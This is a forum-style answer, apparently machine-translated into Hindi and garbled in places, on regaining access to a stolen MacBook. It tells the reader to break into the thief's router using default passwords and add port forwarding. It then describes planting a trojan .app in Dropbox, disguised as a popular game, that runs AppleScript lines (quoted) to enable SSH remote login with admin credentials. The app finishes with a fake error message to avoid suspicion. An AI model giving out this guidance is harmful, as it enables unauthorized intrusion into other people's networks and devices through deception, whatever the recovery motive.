मुझे याद है कि डॉ। ज़ोज वीडियो देख रहे थे। अच्छी चीज़।
ऐसा लगता है कि आप शेल स्क्रिप्टिंग के साथ सक्षम हैं और बस एक हमले वेक्टर की आवश्यकता है। ज़ोज़ ने जो किया उसके समान कुछ करने की कुंजी को एसएसएच एक्सेस मिल रहा है। उनकी स्थिति के विपरीत, जहां चोर एक डायलअप मॉडेम का उपयोग कर रहा था, यह लगभग निश्चित है, क्योंकि नए मैक डायलअप नहीं करते हैं, कि चोर एक ब्रॉडबैंड कनेक्शन का उपयोग कर रहा है, और किसी प्रकार के एनएटी राउटर के पीछे है।
यहां तक कि अगर SSH को मशीन पर सक्षम किया गया था, तो मशीन के SSH श्रवण पोर्ट को बाहर से एक्सेस करने के लिए आपको पोर्ट फॉरवर्डिंग को राउटर पर सेट करना होगा। एक ब्रॉडबैंड कनेक्शन का उल्टा यह है कि आईपी एड्रेस डायलअप की तुलना में लगभग निश्चित रूप से कम बार बदल जाएगा।
यदि मैं आपकी स्थिति में था, तो चोर के आईपी को पकड़कर, मैं सबसे पहले उनके राउटर के वेब इंटरफेस में लॉग इन करने की कोशिश करूंगा और देखूंगा कि मैं वहां से क्या कर सकता हूं। यह आश्चर्यजनक है कि कितने लोग अपने डिफ़ॉल्ट राउटर / मॉडेम पासवर्ड को जगह में छोड़ देते हैं, और ऑनलाइन सूची हैं जहां आप अधिकांश प्रमुख निर्माताओं के लिए डिफ़ॉल्ट पासवर्ड पा सकते हैं।
एक बार अंदर जाने के बाद, राउटर पर डीएचसीपी क्लाइंट लिस्टिंग की जांच करें और देखें कि क्या आप मैकबुक पा सकते हैं। बहुत सारे राउटर मैक (हार्डवेयर) एड्रेस, आंतरिक आईपी पता (192.168.1.x सबसे अधिक बार) और सबसे महत्वपूर्ण, मशीन का नाम दिखाएंगे।
यह पता लगाएं कि कौन सा आईपी मैकबुक को सौंपा गया है और फिर राउटर की सेटिंग में इसके आगे एक पोर्ट सेट करें। 22 के अलावा कुछ बाहरी पोर्ट का उपयोग करें, (उदाहरण के लिए पोर्ट 2222) और मैकबुक के आईपी के 22 को पोर्ट करने के लिए आगे।
कई राउटर्स में SSH का उपयोग चालू होता है, इसलिए चोर के IP @ पोर्ट 22 तक पहुंचने से आपको मशीन शेल के बजाय राउटर शेल तक पहुंच सकता है। अब आपके पास चोर के बाहरी आईपी (जो आपको ड्रॉपबॉक्स से मिला है) पर एक पोर्ट होना चाहिए जो आपको सीधे पोर्ट एसएसएच पर मिल जाएगा मैकबुक पर बाध्य होना चाहिए। सिवाय SSH के अभी तक चालू नहीं हुआ है।
इस भाग को चोर से कुछ कार्रवाई की आवश्यकता होती है। मुझे ईमेल विचार पसंद है लेकिन इसके लिए आवश्यक है कि आपका मित्र Apple मेल का उपयोग कर रहा हो। एक बेहतर तरीका यह हो सकता है कि ड्रॉपबॉक्स में एक प्रलोभन .app फ़ाइल अपलोड किया जाए जो SSH (रिमोट लॉगिन) को चालू कर देगा।
आप इसे शेल स्क्रिप्ट के माध्यम से कर सकते हैं, लेकिन इसे एप्सस्क्रिप्ट के माध्यम से कर रहे हैं, एप्सस्क्रिप्ट को एक .app के रूप में सहेज कर एक अच्छा आइकन दे रहे हैं, यह सब आपके निशान को बेवकूफ बनाने और खुद को दूर न करने की दिशा में एक लंबा रास्ता तय करेगा।
दूरस्थ लॉगिन चालू करने के लिए यहां एप्सस्क्रिप्ट कोड दिया गया है:
do shell script "sudo systemsetup setremotelogin on" user name "Friend's Username" password "Friend's Password" with administrator privileges
यह बिट कोड मशीन के सीरियल नंबर के साथ एक स्ट्रिंग लौटाएगा जिसे आप अपने आप को ईमेल कर सकते हैं यदि आप ऐसा करना चाहते हैं:
do shell script "sudo system_profiler |grep \"r (system)\"" user name "Friend's Username" password "Friend's Password" with administrator privileges
मैं एप्सस्क्रिप्ट को लिखूंगा ताकि यह रिमोट लॉगिन को चालू करे, आपको जो कुछ भी आवश्यक है वह करता है। जीयूआई या शेल के अलावा किसी भी एप्लिकेशन को स्क्रिप्ट करने की कोशिश न करें क्योंकि इससे संदेह बढ़ेगा। अंत में "इस एप्लिकेशन को इस Macintosh पर नहीं चला सकते हैं" के प्रभाव के लिए एक संदेश प्रदर्शित करें। संदेह को कम करने के लिए "छोड़ो" बटन के साथ। एक बार जब स्क्रिप्ट AppleScript एडिटर में काम कर रही होती है, तो उसे केवल रन .app फ़ाइल के रूप में सहेजें।
.App को एक लोकप्रिय खेल के रूप में बदलने की कोशिश करें, पौधे बनाम लाश या एंग्री बर्ड या कुछ और। आप आइकन को असली गेम के .app से निर्यात कर सकते हैं और इसे एप्सस्क्रिप्ट से आपके द्वारा निर्यात किए गए .app में डाल सकते हैं। यदि आपके दोस्त को चोर पर एक अच्छी नज़र है, तो आप सामाजिक रूप से उसे / उसके प्रोफाइल को बदल सकते हैं और .app को कुछ और के रूप में दिखा सकते हैं, जिसमें वे रुचि रखते हैं।
बशर्ते कि आप पोर्ट को आगे सेट कर सकते हैं (आपका चिह्न उचित सुरक्षा प्रथाओं को लागू नहीं करता है), और आप आवेदन चलाने के लिए उसे / उसे प्राप्त कर सकते हैं, आपके पास मशीन के लिए पूर्ण एसएसएच पहुंच होगी और बिना सुराग की तलाश जारी रख सकते हैं तुरंत अपनी उपस्थिति देना। इसके लिए यह भी आवश्यक है कि यह चिह्न ड्रॉपबॉक्स के ग्रोथ नोटिफिकेशन से थक न जाए और इसे छोड़ दें, इसलिए मैं आपके दोस्त को सलाह दूंगा कि वह अपने ड्रॉपबॉक्स को कुछ समय के लिए फाइलों को सहेजना बंद कर दें।
नोट: यदि चोर अपने आईएसपी से डिस्कनेक्ट करता है और फिर से जुड़ता है, तो उन्हें एक नया बाहरी आईपी मिलेगा। ड्रॉपबॉक्स में एक फ़ाइल जोड़ें और इसे सिंक करने के लिए प्रतीक्षा करें। यह आपको अपडेटेड आईपी मिलना चाहिए।
नोट 2: यदि उपयोगकर्ता एक निश्चित समय (आमतौर पर 24 घंटे) मैकबुक के साथ राउटर से कनेक्ट नहीं होता है, तो मैकबुक को सौंपे गए आंतरिक आईपी पते के लिए डीएचसीपी पट्टे की अवधि समाप्त हो जाएगी। सबसे अधिक संभावना है कि यह अगली बार कनेक्ट होने पर समान आईपी पता प्राप्त करेगा, जब तक कि किसी अन्य डिवाइस को नेटवर्क में पेश नहीं किया जाता है। इस घटना में आपको मैन्युअल रूप से राउटर में वापस लॉग इन करना होगा और पोर्ट को आगे संशोधित करना होगा।
यह हमले का एकमात्र साधन नहीं है, लेकिन यह वही है जिसे मैं दूसरा महसूस करूंगा कि आईपी अभी भी ड्रॉपबॉक्स के माध्यम से अपडेट किया जा रहा है। सौभाग्य!
संपादित करें: प्रत्येक "डू शेल स्क्रिप्ट" लाइन के अंत में "व्यवस्थापक विशेषाधिकार" बहुत महत्वपूर्ण है। उपयोगकर्ता को आपके मित्र के व्यवस्थापक पासवर्ड के लिए संकेत दिया जाएगा और स्क्रिप्ट विफल हो जाएगी, यदि आप उपयोगकर्ता नाम और पासवर्ड इनलाइन शामिल नहीं करते हैं।